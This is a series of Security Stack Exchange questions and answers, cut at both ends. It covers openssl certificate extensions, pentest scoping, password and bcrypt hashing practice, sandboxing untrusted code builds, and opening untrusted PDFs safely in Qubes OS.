65:45:75:dc:c7:35:28:ce:f4:55:c4:82:db:fa:b1:48:6d:05:
b2:ac:65:ee:cd:b5:b2:52:b7:dc:3c:9c:67:a5:08:28:2e:57:
57:65:46:16:54:6b:6d:be:73:d2:2f:bd:f5:12:b8:84:43:2a:
f1:15:bd:1a:c1:37:76:20:9f:00:0d:a4:28:e4:c7:ad:0a:d9:
1d:08:e3:d4:77:d7:e1:63:d8:02:57:ed:49:71:7f:c7:be:ae:
39:06:5c:09 As you can see, it's missing the X509v3 extensions section, and I don't know why, because it's there in the csr . So, what's missing in the last command to include the extensions?? | According to the bugs section of the x509 command documentation , Extensions in certificates are not transferred to certificate requests and vice versa. To work around this, I manually added the extensions to the self-signed certificate. This I did by copying the options from the [v3_req] section into a [v3_ca] section in a new file, and supplying that as an extensions file to the x509 command: -extensions v3_ca -extfile ./ssl-extensions-x509.cnf # ssl-extensions-x509.cnf
[v3_ca]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
subjectAltName = IP:127.0.0.1, IP:192.168.73.120, IP:192.168.73.121
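Putting it together, the signing step from the question becomes (same file names as above; only the last two options are new):
openssl x509 -req -in etcd1.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out etcd1.pem -days 1024 -sha256 -extensions v3_ca -extfile ./ssl-extensions-x509.cnf
The -extfile option points at the new file, and -extensions names the section inside it whose entries get copied into the issued certificate. | {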
"source": [
"https://security.stackexchange.com/questions/150078",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15194/"
]
} |
150,096 | Specifically considering client websites where we have been asked to execute a pen test; at what point do we stop and say we're done? We have access to various tools (some automated, some manual); but if we say "we tried all our tools, and couldn't make any progress", that could be construed as us saying that we're not clever enough (and there's always some hacker out there who could be cleverer). So; how do we protect ourselves against upset clients who claim that we didn't work with due diligence? Is there a standard report framework we can work within? | So this is actually a very interesting question for the industry in general. The way I would suggest you handle it is: (1) Have something in your contract that disclaims liability for vulnerabilities not noted during testing. The reason for this is that it's basically impossible to be sure that you've found every exploitable issue in a website, or any other system. To pick one example, think of all the sites that were sitting vulnerable to shellshock for years and years; should all the pen test companies who touched one of those sites be liable for not telling their customers? (2) Have a methodology, saying what you will do. This should cover the general areas of testing that will be completed. For websites, consider basing it on something like the OWASP Top 10 as a starting point. This gives you some common ground with the customer on what you'll be looking at. (3) Make sure your company covers the basics with a checklist. As @rapli says above, document all the little things, but don't overblow the severity. Whilst it's important to make sure your test isn't just a checklist, using one can avoid embarrassing mistakes where basic tests get missed. The problem you might/will run into is unrealistic expectations from customers; that one is a case-by-case thing to address. If you get a customer that expects that their complex application will be completely reviewed in like 5 person-days of testing, well, you should explain why that's not a practical concept :) | {
"source": [
"https://security.stackexchange.com/questions/150096",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66867/"
]
} |
150,153 | By dumbphone I mean: no internet connection, very limited features, etc. By more secure I mean: secure from malicious and direct hacking. I don't mean as in protected from government tapping/snooping; I don't mean from authorities who could be granted access somehow, through the mobile operator company. Has the security of the basic phone call changed much, in the last 10 years ? Obviously smartphones have an endless number of new security holes as time goes on, a quick browse of Apple's security updates history, or searching Android in the tech news, proves this. But I'd suspect most of these vulnerabilities can be utilised because of the frequent connections to the internet made with them.
So, do smartphones utilise anything new [purely in] the initiation and connection of just the phone call itself? | Has the security of the basic phone call changed much, in the last 10 years? So, do smartphones utilise anything new [purely in] the initiation and connection of just the phone call itself? Yes. There are new technologies used to establish phone calls in cellular networks. Those new technologies mitigate some attacks which were possible due to flaws in the older ones. So if you use a "dumbphone" that runs on the older technologies you are subject to those attacks (i.e. the inverse is true: the smartphone is, in this respect, more secure). The technologies used in cellular networks basically evolved over time like this: 1st generation (analogue), 2nd generation (GSM etc.), 3rd generation (UMTS etc.), 4th generation (LTE etc.). If you use a device running, for example, the GSM technology, an attacker might intercept your calls with hardware costs of only about $30 USD . Intercepting calls made with the newer technologies is harder, up to a point where only nation-state attackers can perform them. | {
"source": [
"https://security.stackexchange.com/questions/150153",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/112311/"
]
} |
150,184 | I'm on a temporary job so they don't give me any passwords to access the sites and resources I need. Instead, they tell me to move to another computer where a regular employee is and where every password is already set and saved on the browser. I have to be honest, I got into the router (as they are using default credentials) to get the WiFi password so I can use it on my phone and found that it had a lot to do with the activity the company does ( e.g. if they were a restaurant, their password would be coffe123 ). With that in mind, I just wanted to see if the same pattern was used for other types of resources such as the email address, hosting accounts, etc. and yes, they were. When registering another domain with a new account, I guessed the password by seeing my boss slowly typing on the keyboard and, again, weak as f*. Should I tell them? I'm afraid I might get in trouble for lurking too much. Just as a clarification: it's not a big company, we are just a few employees and none of them but me know about computers and security, so there's no way of anonimously reporting the issue or contacting a sysadmin or IT related guy. | While there is no doubt that weak passwords are an issue for your company, I would strongly advise against telling your boss about the things that you have done. Your company decided against giving temporary workers access to sites and resources for a reason. Not only did you gain unauthorized access to the wireless LAN by guessing the password to the router, you also extended that access by probing the credentials against other resources - Resources that you were not supposed to have the password to. You then basically shoulder surfed your boss. While there seem to be flaws in your employers policy concerning the access to company resources, and their password policies, all of these things could be considered 'hacking' by your employer and were definitely outside of your authorization. If I were you I would log off the WLAN and ask your employer for the password if you want to have access to it. Apart from that you should stop trying to use other peoples passwords on any access points just 'to see if the same pattern was used'. Depending on the legal system of the involved countries you can very well face legal problems for these kinds of acts. So what should you do with the information you have? If your employer gives you a password to a service or a resource you could point out, that e.g. that password would easily be guessable for other people. I would not mention the other password here directly though. If your boss seems interested you could volunteer to research password best practices for the company. If they are serious about it, this would eliminate your concerns. If there is an IT person in the company you could bring these concerns to him as he will probably understand the need for a secure password policy better. | {
"source": [
"https://security.stackexchange.com/questions/150184",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108682/"
]
} |
150,331 | When I'm opening https://india.gov.in , it's opening all right. But for https://www.india.gov.in , the browser is throwing a certificate error. Why is that happening? | www is a common prefix for websites. However, at a technical level it is just another subdomain, and there's nothing special about it. If a webserver accepts both or even more DNS names, it has to be configured that way. The server decides which configuration to use based on the DNS name in the HTTP request. The certificate served for https://india.gov.in covers india.gov.in . It does not cover www.india.gov.in , nor does it cover any other subdomain ( foo.india.gov.in ) or other domain ( example.com ). This is the most basic form of TLS certificate, and a pretty common one. The DNS records for india.gov.in and www.india.gov.in don't necessarily have to go to the same place; they could resolve to different IP addresses or even use different DNS record types. This is commonly done for hosting various applications on a single base domain, e.g. having mail.india.gov.in go to a webmail server. A common way for companies to deal with this sort of issue is to buy a wildcard certificate ( *.india.gov.in ) to cover all their subdomains. OWASP recommends against this because you have to secure every endpoint that needs the certificate (in our example above, an attacker breaching the webmail could extract the certificate and use it to man-in-the-middle a connection to the normal website, or vice versa). A better option is to use a SAN certificate that includes just india.gov.in and www.india.gov.in , then set up redirects for any page requested on one domain to the other.
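You can inspect which names a served certificate actually covers from the command line, e.g.:
openssl s_client -connect india.gov.in:443 -servername india.gov.in </dev/null 2>/dev/null | openssl x509 -noout -text | grep -A1 'Subject Alternative Name'
If www.india.gov.in does not appear in the Subject Alternative Name list (and no matching wildcard does either), the browser error above is exactly the expected behaviour. | {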
"source": [
"https://security.stackexchange.com/questions/150331",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42745/"
]
} |
150,337 | What could happen if someone continuously sends frames with different source MAC addresses to the same port on a switch? Knowing that this port doesn't apply the "port-security" mode. | | {
"source": [
"https://security.stackexchange.com/questions/150337",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138306/"
]
} |
150,342 | Are video calls placed through FB messenger really private or safe? What is the probability that it could be sniffed or intercepted by hackers? Is Facebook recording the data or just meta data of the video calls? If so, for how long? | | {
"source": [
"https://security.stackexchange.com/questions/150342",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138206/"
]
} |
150,486 | I want to make a little programming puzzle on my website. There's going to be a task. The user will be asked to upload a C++ source file with their solution. The file should be compiled, run with some input and checked if it produces the right output. What are the security risks? How do I make sure that the uploaded file won't be able to do anything malicious? Alternatively, there are sites like Tutorials Point that let you compile and run C++ code. How do they manage the security? | It is impossible to analyze a program to find out if it will do anything malicious. That is true regardless of whether you are attempting to analyze the source or compiled code. The way to do what you are asking for is to compile and run the code in a sandbox. Once the program has terminated (or after a timeout you have decided upon) you destroy the sandbox. The security of such a construction is only as good as the sandbox you are using. Depending on the requirements of the code you need to run, the sandbox could be either something simple like Linux secure computing mode, or something complicated like a full blown virtual machine - ideally without network connectivity. The more complicated the sandbox you need, the larger the risk of a security vulnerability in the sandbox undermining an otherwise good design. Some languages can safely be compiled outside a sandbox. But there are languages where even compiling them can consume an unpredictable amount of resources. This question on a sister site shows some examples of how a small source file can blow up into a large output. If the compiler itself is free from vulnerabilities it may be sufficient to set limits on the amount of CPU, memory, and disk space it is allowed to consume. For better security you can run the compiler inside a virtual machine. Obviously these methods can be combined for an additional layer of security. If I were to construct such a system I would probably start a virtual machine and inside the virtual machine use ulimit to limit the resource usage of the compiler. Then I would link the compiled code in a wrapper to run it in secure computing mode. Finally, still inside the virtual machine, I would run the linked executable.
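A minimal sketch of the ulimit step (bash; the specific limits and file names are illustrative assumptions, not recommendations):
#!/bin/bash
ulimit -t 10        # at most 10 CPU-seconds per process
ulimit -v 1048576   # at most ~1 GiB of virtual memory (value is in KiB)
ulimit -f 10240     # at most ~5 MiB of created files (value is in 512-byte blocks)
timeout 15s g++ -O2 -o solution submission.cpp   # wall-clock cap on the compile
timeout 5s ./solution < input.txt > output.txt   # and on the run
Note that ulimit only caps how much the process may consume, not what it may do; the actual confinement still has to come from the virtual machine or seccomp layer described above. | {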
"source": [
"https://security.stackexchange.com/questions/150486",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138475/"
]
} |
150,527 | I just got a letter from a court saying I made 49 threats to someone I had a problem with three years ago. This person presents "my emails" as evidence. I went through all my emails, and I haven't found a single one. The emails presented as evidence all come from my email address. He asks for 20,000 dollars for moral damage!
How can this happen? (ed. The letter is a valid and official legal document in accordance with the normal procedures in the country of Portugal. OP has already engaged with a lawyer. The accuser is a known scam artist. This question is about the technical details of the emails.) | Is it a scam? First of all, make sure that you actually got the letter from a court. This might very well be a scam - it sure sounds like one. Do this to verify that the letter is real: Make sure that the name of the court correspond to a real court. Find contact information to that court through some independent method (i.e. not using any information in the letter). Contact them and ask them if they did in fact send the letter. If it is not a scam If it is not a scam, I see three possibilities: The person accusing you of the threats never received the emails, and have forged the evidence. That would not be hard to do. (An investigation of the email headers will not help here, since they can also be forged.) Someone has spoofed your email address, and has sent emails that appear to come from you. This is by no means impossible . (An investigation of the email headers could be useful here.) Someone has hacked your email account (perhaps you used the same password on a site that was breached ), sent the emails, and then deleted all traces (e.g. removed them from the sent items folder). (An investigation of the email headers would not help here, since the email is in fact sent from your address. Access logs from your email provider could prove useful, though.) If it's not a scam, what you need to do in any case is to get some legal advice. | {
"source": [
"https://security.stackexchange.com/questions/150527",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138528/"
]
} |
150,540 | I use an RSA key to log into remote servers with ssh. And I keep my dot files under version control in a publicly accessible place so that I can quickly set up new servers to work the way I like. Right now I don't have my .ssh directory under version control. But it would save a step if I could keep .ssh/authorized_keys in the dotfile repository. It's just a public key. My private key sits only on trusted client machines in my possession, of course. I made it a 4096-bit RSA key because that seems like the best balance between wide compatibility with common sshd versions and security. So my question is, is there any security problem with literally publicly publishing the public key? Nobody is regularly nosing around my dotfiles repository, but it's not a secret and anybody interested could read them. | Public keys are designed for sharing: read access to, and/or publishing of, a public key is fine. Private keys are secret: they should only be accessible to the owner of said private key. To drive this point home, think back to every HTTPS website you have ever visited. In each case, as part of HTTPS the site gives you their public key. So not only is it safe to publish it, it is intended to be this way. For example, if you click on the green lock icon on your address bar, you can find the public key for this website (if you are viewing it on HTTPS) *.stackexchange.com
Modulus (2048 bits):
BD 15 6A 1B 0A 03 69 CC 00 99 A0 4E 9E 31 99 34
3F 32 B8 6B 7C 62 0A 4D DC 45 41 72 8A 3E 92 DA
B3 64 45 B2 31 59 DE 71 60 D3 E3 26 91 DE 55 0D
3C F1 8C E2 C3 4C 01 F1 39 B4 A1 45 D5 9A 77 05
FC 2D 92 C6 B9 CE 10 4D DB 6F 7B 72 44 C0 18 38
4E B3 5E 3B 59 74 5C 52 E1 E7 3F E9 1C B8 23 F5
94 99 BE E7 BC 19 AA DE C0 6A C4 5E 4C 83 2D 5E
3B 1F 7F 97 56 42 28 C9 9E E4 D7 E8 45 E2 E1 D5
D5 E3 FD 73 01 D5 59 49 7C 97 82 F4 F3 AC 09 5B
4D 88 A1 F0 A3 7F 9A D6 2E E1 32 78 5C 0E F8 7D
74 E5 1C E8 C5 62 5A 78 AF 3C C4 51 75 FA F8 41
C4 5F 60 47 CE 81 80 83 57 6A 6C 31 29 EA C8 8A
CB C8 8C 3F 50 51 F0 06 F2 D2 24 18 60 87 7D AB
B0 6F 81 F6 3E B7 F1 F3 6F ED 67 73 41 EA FF 83
61 CA C3 2C A6 44 F2 58 21 6C C9 DD EC 95 85 7C
B2 AD E4 35 E2 9B 9F 82 0C 7A AB 58 18 0E 54 97
Public Exponent (24 bits):
01 00 01 Further examples of this can be found on github.com where they request that you attach a public key to your account for use with git clone [email protected]:<user>/<repo> You can actually check the public keys of any user on github with the following URL https://api.github.com/users/<user>/keys mine is listed as: [
{
"id": 18667533,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDraswAp7EbMwyYTzOwnSrsmr3nNMDaDf4e2YVaehLc9w6KN2ommomXZO8/V9N3yINNveGqrcVc9m2NTm04iILJUKd9o25ns8QIG6XSCt9SVx/Xw1J/SXfIWUKuEe0SgmIwVwkk8jetfG/Z7giSiU3dxxC4V9lHQCFgKOKBWGpNbINmqtmBWncX3HJKeXrpSddoePbZZ84IEFr4CWUlqoXyphpxqzpfA9sRpVTtyBPcUSj68j4+gKgEQN65G6LXys3q8BiwWxucci6s34vp4L8jKn7uYh26vLuT1oIbODJphCmpvMH+ABPkNQcFBk4rRLpCEAsoAhmvTk/NjnfZM+nd"
},
{
"id": 21175800,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5tPV481acCZ5wm2E15gXkVRaKCE3lic/O8licyzW+eDE9rPpG4rHRRH9K2ENmstUh5nLEenb0nNhEGnsf3pIJRZ07JXwv16+lsJBSS8+YiWeMBlwo+JNaxwSyUlYUgl1ruogr0nR0KBqsYSWXuG0s2jm2IOV+0B/0fzDR/tiLFLj50+iJ9qCDSk/8fAsXz2xG39KcUcxmCbDXb/qSdESWaZc+pafNRiCcVNfMkKeDViWlzI4VkiTcfVCraHUuYx4jgOBB526dRWSDG9bLchwlJiopgT+k4X/TNe2l01DPwYetwLvY6V8rcPrjjJL8ifRTMSof1zRIoBgJZhRzWc1D"
}
] The exact opposite is true of Private Keys, which should be secured at all times and never given to a third party or exchanged via email without encrypting them. If someone has accessed your private key, they have the ability to access any device or encrypted file that was protected with your public key. It also means that they can sign things on your behalf. It is VERY bad if someone has gained access to your private key. In many cases SSH clients will not function if they detect that the permissions of the private key file are such that users other than you have read access.
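A practical aside: because the public half can always be re-derived from the private key, there is never a reason to put anything sensitive in your dotfiles just to publish it. For example:
ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
prints the public key that corresponds to the given private key file, and that one line is exactly the authorized_keys material you would commit to the repository. | {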
"source": [
"https://security.stackexchange.com/questions/150540",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88848/"
]
} |
150,549 | I have a server with suhosin installed (a protection system for PHP installations). I noticed software I am running is causing the following logs on suhosin. ALERT - configured GET variable value length limit exceeded - dropped variable
ALERT - configured request variable name length limit exceeded - dropped variable Could allowing long request variable names or values present a security issue? | | {
"source": [
"https://security.stackexchange.com/questions/150549",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
150,555 | My questions refer to detecting fake User-Agent headers, in the sense of spoofing user OS, web-browser and other info sent in headers from users browsing resources on my server. Is there a way to detect if a user is using some tools to fake his fingerprint, e.g. by setting a fake User-Agent? Is it possible to detect if a user changes its headers by browser developer tools or some other more sophisticated anonymization software? | | {
"source": [
"https://security.stackexchange.com/questions/150555",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62048/"
]
} |
150,740 | I was watching this video about TLS 1.3: " Deploying TLS 1.3: the great, the good and the bad (33c3) " and was somewhat surprised to see that in their effort to provide "fewer, better choices" they dropped AES-CBC as a supported block cipher mode. The video lists a number of attacks (Lucky13, POODLE and others), which to my untrained eye seem to be implementation issues. I understand that it is better to have a mode that doesn't encourage such implementation issues, but was that all it took to deprecate this entire cipher mode? While the book Cryptography Engineering is somewhat dated (2010), it recommends AES-CBC using a randomly generated IV as the best option. | The problem here is not so much with CBC, but with alternatives that are easier to implement safely, without losing mathematical security. In fact, AES-CBC turned out to be notoriously difficult to implement correctly. I recall that older implementations of transport layer security didn't use cryptographically secure initialization vectors, which are a must-have for CBC mode. A lot of recent attacks are padding oracle attacks, like the Bleichenbacher attack . These especially depend on old modes kept for support. POODLE is a downgrade vulnerability. LOGJAM is downgrading TLS to old, export-grade (read NSA-sabotaged) crypto suites. For CBC mode, there is the Vaudenay attack.
These attacks depend on the server explicitly saying "invalid padding", thereby leaking 1 bit of information on each transaction. Error messages were removed, but the problem of timing remained. The server still used more time before responding if the padding was valid. In response, implementers were forced to come up with the peculiar workaround of generating a dummy key, and using that for decryption so it would fail in another part of the implementation. In every implementation. So the designers decided to no longer force that on developers, by no longer supporting the mode in the specs. Cryptography is a very broad field, and a specialty on its own. History has taught us, through uncomfortable experience, that doing it perfectly is almost never guaranteed, even for the best in the field. For example, MD5, created by Ron Rivest, co-inventor (and part-namesake) of RSA, was widely used, then broken: collisions were first demonstrated in 2004, and by 2013 its collision resistance could be circumvented in 2^18 time, less than a second on a desktop computer for 128-bit hashes.
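For contrast, a minimal sketch of the AEAD style that TLS 1.3 standardized on instead, using Python's cryptography package (an illustration of the API shape, not of TLS itself):
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)
nonce = os.urandom(12)  # 96-bit nonce; must never repeat for the same key
ct = aesgcm.encrypt(nonce, b"secret payload", b"associated data")
pt = aesgcm.decrypt(nonce, ct, b"associated data")  # raises InvalidTag on any tampering
The point is that decryption either succeeds or fails with one uniform InvalidTag error; there is no separate padding-validity step whose outcome a server could leak through error messages or timing. | {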
"source": [
"https://security.stackexchange.com/questions/150740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138779/"
]
} |
150,758 | I'm writing a simple REST API, and I want to restrict access to my mobile-client only. In other words, I'm trying to prevent a malicious user from e.g. using curl to make an unauthorized POST request. Of course, this is impossible. However, there are certain countermeasures that make it difficult for a hacker to succeed. Right now, I am encrypting all requests with a private key, stored client-side (obviously, this is not ideal, but the difficulty in reverse-engineering an iOS app will hopefully deter all but the most determined hackers). One simple idea I had is to return the wrong HTTP response code for an unauthorized request. Rather than return a "401 Unauthorized," why not return e.g. "305 Use Proxy," i.e. purposely being confusing. Has anyone ever thought about doing this? | Has anyone ever thought about doing this? Yes, there was actually a talk about exactly this at defcon 21 ( video , slides ). Their conclusion was that working with response codes as offensive security can sometimes result in severely slowing down automatic scanners, non-working scanners, and a massive amount of false-positives or false-negatives (it will obviously do little to nothing for manual scans). While security by obscurity should never be your only defense, it can be beneficial as defense in depth (another example: it is recommended to not broadcast version numbers of all used components). On the other hand, a REST API should be as clean as possible, and replying with purposely wrong HTTP codes may be confusing for developers and legitimate clients (this is a bit less of a problem for browsers, where users don't actually see the codes). Because of this I wouldn't recommend it in your case, but it is still an interesting idea. | {
"source": [
"https://security.stackexchange.com/questions/150758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138794/"
]
} |
151,165 | We should all know the XKCD comic on password strength , suggesting (appropriately) that a password based on multiple common words is more secure and memorable than a password such as Aw3s0m3s4u(3 or something. I have an application (multi-platform) that I want to generate somewhat secure passwords for, and my password requirements are much less demanding: if the password has no spaces I expect the 'multiple symbols, numbers, mixed alpha and 6+ characters', but if the password has more than one nonconsecutive space I'm relaxing the symbol/number/mixed case constraint, and instead require at least two words that are no less than 4 characters individually, with a minimum password length of 15 characters. The question isn't about that aspect, but about generating: assuming I want to generate an easy-to-remember and hard-to-guess password for the user, is it cryptographically safe to generate a password based on 5 or so dictionary words from a 10k word list? (Literally 10k words sit in my database, scraped from various sources, emails, etc.) They're all pretty common words, no less than 3 characters in length. Now I don't want to make these one-time passwords, but I'm suspecting I should at least require the user to change it to something else upon logging in after using this generated password, which is fine and I can , but I also want users to have the option (on changing a password) to generate a 'secure' password that fits my requirements. From a cracking standpoint, how easy/difficult would it be to attack a password generated using this scheme? There's no fixed length, words in this database table range in length from 3 characters to 11 characters ( environment is a word in the database, for example)? The programme generating the passwords will not pick two words with 4 or fewer characters (so the shortest password could be one three-character word, 4 five-character words, and 4 spaces, for a total of 27 characters), and it will not use the same term twice in a password. Based on samples I've run against it, the average password length generated by the programme is ~34 characters, which seems acceptable to me. Even if we assume that each of the 27 minimum non-space characters (so 23 characters in the end) can be 26 possible states ( a-z ), that's 23^26 or 2.54e+35 possibilities. There are 994 words in the database with 3 to 4 characters in length. We can also assume that the attacker has the dictionary, and the generation parameters/algorithm. Is this still secure, can I get away with taking one word away from the generated password (that's still 21 characters, for 18^26 possibilities ( 4.33e+32 ) based on entropy alone), the only problem I see is that this isn't based on character entropy, but on word entropy, which would mean the 5-word password is 10000*9006*9005*9004*9003 possibilities, or 6.5e+19 possibilities, and the 4-word password is 10000*9006*9005*9004 possibilities, or 7.30e+15 . Compared to a normal 6-character password ( (26+26+10+33)^6 or 7.35e+11 possibilities: 26 lower alpha, 26 upper alpha, 10 numbers, 33 symbols) it's significantly stronger. Another assumption I made: users will write this down, they always do. I suspect that five random words on a piece of paper (hopefully not in direct sight, but alas that's the most likely scenario) are less-likely to be picked up as a potential password than a, well, complex term that looks like a traditional password. 
Lastly, before I get to my actual questions, the passwords are all salted before being stored in the database, then hashed with the SHA-512 algorithm 100 times, with the salt being appended between each hash. If the user logs in successfully then the salt is changed and a new password hash is created. (I assume this doesn't help much in a brute-force offline attack, but it should help against active online attacks I would think.) DatabasePassword = SHA512(...SHA512(SHA512(SHA512(password + salt) + salt) + salt) + salt)...) So, finally, my actual questions: Is my math correct? (You don't necessarily have to answer this, I'm sure it's close enough in principle to demonstrate my concerns.) Is this generation secure or should I stick to the 'traditional' password generation? Do note that an attacker doesn't have any idea on whether the user's password was generated with this algorithm or selected by the user; the attacker can make an assumption if they know the length, but that may or may not be a safe one. Lastly, did I make any assumptions that would significantly alter (increase or decrease) the security of this 'idea'? (By assuming the per-character entropy of a 6-character password is 95, for example.) Apologies for the length, I'm used to over-explaining myself to hopefully alleviate confusion. It was pointed out that my question is extremely similar to this one , I want to point out the differences in my generation method (though, honestly, it's still similar enough that it could be considered a duplicate, I leave that up to the community to decide): Each word is separated by a space, this means that all but the first and last three characters have an additional potential state. The password is not selected by a human, it's (mostly) uniform-random generation. No words are preferred over others except to only allow one ultra-short (3 or 4 character) word, once the random generator selects a word of that length no more of those may be selected. (Though the position that word will be in the list of words is random still, and there may not be an ultra-short word selected.) This is mixed in with a separate password restriction, which means the attacker has two vectors to attempt to crack. The user could have selected a password meeting the 'traditional' requirements or a password meeting the 'XKCD' requirements. | First, there is no such concept as a cryptographically secure password. The aim of a password is to be hard to guess for an attacker, and how hard it should be to guess depends on how the password is used: if the account is locked after three failed attempts the password can be weaker than when an attacker can try an unlimited number of passwords or when the attacker has access to the hashed passwords. In your case you create a password by randomly choosing 5 words from a set of 10k words. Assuming that the attacker knows your dictionary (not unlikely, because your requirement is easy-to-remember words) and the way the password is constructed from the dictionary, this means that there are (10^4)^5 = 10^20 variants. This is similar to guessing 20 digits or a password with 12..13 random alpha-numeric mixed-case characters. Such passwords are usually considered secure enough for most purposes. As for the storage of the password: don't invent your own method but use methods proven to be good. For details see How to securely hash passwords?
In its current form I would consider the chosen method weak because you are using only 100 iterations with a hash function which is designed to be fast. Just for comparison: PBKDF2 recommended at least 1000 iterations in 2000 already, and LastPass used 100,000 iterations for server-side hashing in 2011. Fortunately you kind of make up for the weaker password storage by having more complex passwords.
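As an aside, the generation step itself is easy to get right with a CSPRNG; a minimal sketch in Python (the wordlist file is a placeholder for your 10k-word table, and the one-short-word rule is omitted):
import secrets

with open("wordlist.txt") as f:  # one word per line, ~10k entries
    words = [w.strip() for w in f if w.strip()]

passphrase = " ".join(secrets.choice(words) for _ in range(5))
print(passphrase)
Using the secrets module rather than random matters here: it draws from the OS CSPRNG, so each of the 10^20 combinations really is equally likely, which is the assumption the entropy estimate above rests on. | {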
"source": [
"https://security.stackexchange.com/questions/151165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/130608/"
]
} |
151,297 | I would like to allow users of my web application to have long passwords, if they so wish. Today I became aware of bcrypt's password length limitation (72 characters, the rest truncated). Would it be secure for me to do the following? I am using PHP. Current Implementation: password_hash($password, PASSWORD_BCRYPT, $options); Implementation in question: password_hash(hash('sha256', $password), PASSWORD_BCRYPT, $option); What are the drawbacks of the implementation in question? I am not a crypto expert, please advise. Will the implementation in question limit the password length that a user can use? If so, what will the limit be? | In general, this will be fine. It's even a fairly well-recommended method to allow arbitrary-length passwords in bcrypt. Mathematically, you are now using bcrypt on a 64-character string, where there are 2^256 possible values (SHA-256 gives 256-bit output, which is commonly represented as a 64-character hexadecimal string). Even if someone pre-calculated common passwords in SHA-256, they'd need to run those through bcrypt to find what the actual input for a given hash was. The main potential drawback is implementation flaws: if you ever store the SHA-256 values, they're relatively fast to break, so an attacker wouldn't need to expend the effort to break the bcrypt values. It would still be recommended to keep a high enough iteration count for the bcrypt step - this shouldn't have any particularly detrimental effect on your processing time, but makes brute force attacks much harder. See Pre-hash password before applying bcrypt to avoid restricting password length for the general case.
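One detail worth making explicit (a sketch; only the third argument differs between the two lines): keep the SHA-256 output in its default hex form, and never feed the raw binary digest to bcrypt:
// Safe: 64 hex characters, comfortably under bcrypt's 72-byte limit
$hash = password_hash(hash('sha256', $password), PASSWORD_BCRYPT);
// Risky: raw binary output can contain a NUL byte, which bcrypt implementations
// commonly treat as a string terminator, silently truncating the input
$hash = password_hash(hash('sha256', $password, true), PASSWORD_BCRYPT);
Verification stays symmetric: password_verify(hash('sha256', $password), $hash). | {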
"source": [
"https://security.stackexchange.com/questions/151297",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92420/"
]
} |
151,300 | As an investigative journalist I receive dozens of messages each day, many of which contain PDF documents. But I'm worried about the potentially malicious consequences of blindly opening them and getting my computer compromised. In the past, before I started working in investigative journalism, I used virustotal.com to analyze all files (including PDFs) coming to my inbox, but that's not possible in this case, as the files would be sent to them even though they're meant to be confidential before release. And I heard that antivirus solutions are not 100% foolproof. What is the safest way to deal with loads of incoming PDF files, some of which could potentially be malicious? | I think the safest option for you would be to use Qubes OS with its built-in DisposableVMs functionality and its “Convert to Trusted PDF” tool. What is Qubes OS? Qubes is an operating system in which everything is based on virtual machines. You can think of it as if you had different isolated ‘computers’ inside yours. That way you can compartmentalize your digital life into different domains, so that you can have a ‘computer’ where you only do work-related stuff, another ‘computer’ that is offline and where you store your password database and your PGP keys, and another ‘computer’ that is specifically dedicated to untrusted browsing... The possibilities are countless, and the only limit is your RAM and basically how many different ‘computers’ can be loaded at once. To ensure that all these ‘computers’ are properly isolated from each other, and that they can't break out to your host (called ‘ dom0 ’ for domain 0) and thereby take control of your entire machine, Qubes uses the Xen hypervisor , [1] which is the same piece of software that is relied upon by many major hosting providers to isolate websites and services from each other, such as Amazon EC2, IBM, Linode...
Another cool thing is that each one of your ‘computers’ has a special color that is reflected in the windows' borders. So you can choose red for the untrusted ‘computer’ and blue for your work ‘computer’. Thus in practice it becomes really easy to see which domain you're working in. So let's say now that some nasty malware gets into your untrusted virtual machine: it can't break out and infect other virtual machines that may contain sensitive information unless it has an exploit for a vulnerability in Xen that lets it break into dom0 (which is very rare). That significantly raises the bar of security (before, one would only need to deploy malware to your machine to control everything), and it will protect you from most attackers except the most resourced and sophisticated ones. What are DisposableVMs? The other answer mentioned that you can use a burner laptop. A Disposable Virtual Machine is kind of the same, except that you're not bound by physical constraints: you have infinitely many disposable VMs at your disposal. All it takes to create one is a click, and after you're done the virtual machine is destroyed. Pretty cool, huh? Qubes comes with a Thunderbird extension that lets you open file attachments in DisposableVMs, so that can be pretty useful for your needs. [2] (Screenshot credits: Micah Lee) What's that “ Convert to Trusted PDF ” you were talking about? Let's say you found an interesting document, and let's say that you had an offline virtual machine specifically dedicated to storing and opening documents. Of course, you can directly send that document to that VM, but there could still be a chance that this document is malicious and may try, for instance, to delete all of your files (a behavior that you wouldn't notice in the short-lived DisposableVM). But you can also convert it into what's called a ‘Trusted PDF’. You send the file to a different VM, then you open the file manager, navigate to the directory of the file, right-click and choose “Convert to Trusted PDF”, and then send the file back to the VM where you collect your documents. But what exactly does it do? The “Convert to Trusted PDF” tool creates a new DisposableVM, puts the file there, and then transforms it via a parser (that runs in the DisposableVM) that basically keeps the RGB value of each pixel and discards everything else. It's a bit like opening the PDF in an isolated environment and then ‘screenshotting’ it, if you will. The file obviously gets much bigger; if I recall correctly, when I tested it a 10 MB PDF turned into a 400 MB one. You can get much more detail on that in this blogpost by security researcher and Qubes OS creator Joanna Rutkowska. [1] : The Qubes OS team are working on making it possible to support other hypervisors (such as KVM), so that you can not only choose different systems to run on your VMs, but also the very hypervisor that runs these virtual machines. [2] : You additionally need to configure an option so that the DisposableVM that is generated once you click on “Open in DispVM” will be offline, so that it can't leak your IP address. To do that: "By default, if a DisposableVM is created (by 